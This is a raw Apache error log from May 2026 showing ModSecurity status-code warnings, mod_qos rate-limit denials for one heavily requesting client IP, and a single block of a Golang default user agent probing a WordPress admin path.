[Tue May 26 19:59:51.718977 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TgAAAALc"]
[Tue May 26 19:59:51.722847 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2AwAAAHg"]
[Tue May 26 19:59:51.731857 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TfwAAAIk"]
[Tue May 26 19:59:51.734820 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz1-gAAADg"]
[Tue May 26 19:59:51.771451 2026] [security2:error] [pid 93576:tid 93727] [client 103.163.220.52:62325] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/"] [unique_id "ahWuX2DRMqfxdEDkosz2NgAAAA8"]
[Tue May 26 19:59:52.108871 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2VwAAADA
[Tue May 26 19:59:52.109261 2026] [qos:error] [pid 106517:tid 106736] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYIZZc2DoU1lPnP1TqgAAANo
[Tue May 26 19:59:52.109549 2026] [qos:error] [pid 106517:tid 106685] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYIZZc2DoU1lPnP1TqwAAAKc
[Tue May 26 19:59:52.113462 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYEqK9k_ZUB2Vp25_qQAAAdg
[Tue May 26 19:59:52.114566 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYEqK9k_ZUB2Vp25_qgAAAfM
[Tue May 26 19:59:52.115316 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2WAAAAF4
[Tue May 26 19:59:52.115443 2026] [qos:error] [pid 106517:tid 106759] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYIZZc2DoU1lPnP1TsAAAAPE
[Tue May 26 19:59:52.118038 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYGDRMqfxdEDkosz2WQAAAHs
[Tue May 26 19:59:52.119116 2026] [qos:error] [pid 106517:tid 106745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYIZZc2DoU1lPnP1TsQAAAOM
[Tue May 26 19:59:52.119261 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2WgAAAAY
[Tue May 26 19:59:52.260911 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2XAAAACA
[Tue May 26 19:59:52.261178 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2WwAAACk
[Tue May 26 19:59:52.261373 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2XQAAAFQ
[Tue May 26 19:59:52.263761 2026] [qos:error] [pid 93868:tid 94296] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYEqK9k_ZUB2Vp25_rgAAAbU
[Tue May 26 19:59:52.267760 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYEqK9k_ZUB2Vp25_rwAAAc8
[Tue May 26 19:59:52.269826 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYEqK9k_ZUB2Vp25_sAAAAbo
[Tue May 26 19:59:52.269840 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuYEqK9k_ZUB2Vp25_sQAAAak
[Tue May 26 19:59:52.269972 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2XwAAAHg
[Tue May 26 19:59:52.275256 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2YAAAADg
[Tue May 26 19:59:52.283865 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TgQAAAMY"]
[Tue May 26 19:59:52.287459 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_fAAAAbY"]
[Tue May 26 19:59:52.289065 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TggAAAKM"]
[Tue May 26 19:59:52.293280 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2BAAAAEc"]
[Tue May 26 19:59:52.298175 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_jwAAAZc"]
[Tue May 26 19:59:52.310062 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2IgAAADY"]
[Tue May 26 19:59:52.314542 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TjAAAAKw"]
[Tue May 26 19:59:52.320841 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2KgAAAHU"]
[Tue May 26 19:59:52.321407 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_fgAAAZE"]
[Tue May 26 19:59:52.321419 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2JgAAAFY"]
[Tue May 26 19:59:52.322853 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2IwAAAFI"]
[Tue May 26 19:59:52.327435 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2KAAAAFM"]
[Tue May 26 19:59:52.330257 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1ThAAAAOo"]
[Tue May 26 19:59:52.332573 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2JAAAAFo"]
[Tue May 26 19:59:52.340460 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2KQAAAEQ"]
[Tue May 26 19:59:52.349153 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_kAAAAac"]
[Tue May 26 19:59:52.355913 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2LAAAAEU"]
[Tue May 26 19:59:52.365983 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2LgAAAFk"]
[Tue May 26 19:59:52.375378 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TiAAAANs"]
[Tue May 26 19:59:52.382792 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2LQAAAGE"]
[Tue May 26 19:59:52.385364 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2LwAAAEo"]
[Tue May 26 19:59:52.390598 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TiQAAAOk"]
[Tue May 26 19:59:52.394472 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_kwAAAaw"]
[Tue May 26 19:59:52.397582 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_kQAAAZk"]
[Tue May 26 19:59:52.401366 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_kgAAAcE"]
[Tue May 26 19:59:52.428269 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2MAAAACc"]
[Tue May 26 19:59:52.433759 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2JwAAAHI"]
[Tue May 26 19:59:52.444340 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TngAAANU"]
[Tue May 26 19:59:52.869139 2026] [security2:error] [pid 93576:tid 93832] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2cwAAAHg"]
[Tue May 26 19:59:52.893066 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2rQAAAD0
[Tue May 26 19:59:52.894306 2026] [qos:error] [pid 106517:tid 106657] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYIZZc2DoU1lPnP1T5QAAAIw
[Tue May 26 19:59:52.897529 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYGDRMqfxdEDkosz2rgAAADU
[Tue May 26 19:59:52.899900 2026] [qos:error] [pid 106517:tid 106726] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYIZZc2DoU1lPnP1T5wAAANA
[Tue May 26 19:59:52.900558 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYIZZc2DoU1lPnP1T6AAAAK0
[Tue May 26 19:59:52.900562 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuYGDRMqfxdEDkosz2rwAAADA
[Tue May 26 19:59:52.900889 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYGDRMqfxdEDkosz2sAAAAAY
[Tue May 26 19:59:52.901004 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYGDRMqfxdEDkosz2sgAAAGI
[Tue May 26 19:59:52.901038 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuYGDRMqfxdEDkosz2sQAAACc
[Tue May 26 19:59:52.901111 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuYGDRMqfxdEDkosz2tAAAACw
[Tue May 26 19:59:53.049416 2026] [qos:error] [pid 106517:tid 106681] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYYZZc2DoU1lPnP1T8AAAAKM
[Tue May 26 19:59:53.052001 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYYZZc2DoU1lPnP1T8QAAANw
[Tue May 26 19:59:53.052476 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYWDRMqfxdEDkosz2uAAAAAE
[Tue May 26 19:59:53.053083 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYWDRMqfxdEDkosz2uQAAABE
[Tue May 26 19:59:53.055100 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYWDRMqfxdEDkosz2uwAAAGw
[Tue May 26 19:59:53.055460 2026] [qos:error] [pid 106517:tid 106690] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYYZZc2DoU1lPnP1T9AAAAKw
[Tue May 26 19:59:53.055859 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYWDRMqfxdEDkosz2ugAAACE
[Tue May 26 19:59:53.057697 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYYZZc2DoU1lPnP1T9gAAAM8
[Tue May 26 19:59:53.076109 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYWDRMqfxdEDkosz2vgAAADA
[Tue May 26 19:59:53.076914 2026] [qos:error] [pid 106517:tid 106739] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYYZZc2DoU1lPnP1T-gAAAN0
[Tue May 26 19:59:53.277921 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TmwAAAMk"]
[Tue May 26 19:59:53.291837 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2MQAAAEI"]
[Tue May 26 19:59:53.297384 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TjgAAAMc"]
[Tue May 26 19:59:53.300754 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TlAAAAIg"]
[Tue May 26 19:59:53.304852 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TlwAAANg"]
[Tue May 26 19:59:53.306598 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_ngAAAZM"]
[Tue May 26 19:59:53.319881 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TowAAAP8"]
[Tue May 26 19:59:53.321032 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TrAAAAKQ"]
[Tue May 26 19:59:53.324202 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2RQAAADo"]
[Tue May 26 19:59:53.327104 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2RAAAAC4"]
[Tue May 26 19:59:53.327172 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2VAAAAAU"]
[Tue May 26 19:59:53.327571 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1ToQAAAJM"]
[Tue May 26 19:59:53.327654 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TlgAAAPc"]
